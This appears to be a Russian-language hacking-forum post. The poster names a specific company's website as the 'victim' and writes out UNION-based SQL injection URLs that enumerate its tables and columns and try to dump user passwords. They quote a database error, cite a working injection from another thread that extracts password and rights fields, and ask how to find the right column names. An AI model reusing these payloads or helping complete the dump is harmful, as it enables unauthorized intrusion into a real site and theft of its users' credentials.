Подскажите:

жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16

узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()

узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()

на выходе имею такую связку (таблица - user, столбцы - userName,userPass)

ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users

и получаю:

Invalid query: Unknown column 'userPass' in 'field list'

Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий:

ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,grou p_concat(userpwd,0x3a,user rights),version(),4,5+from+users--

Где и как найти эти userpwd,0x3a,user rights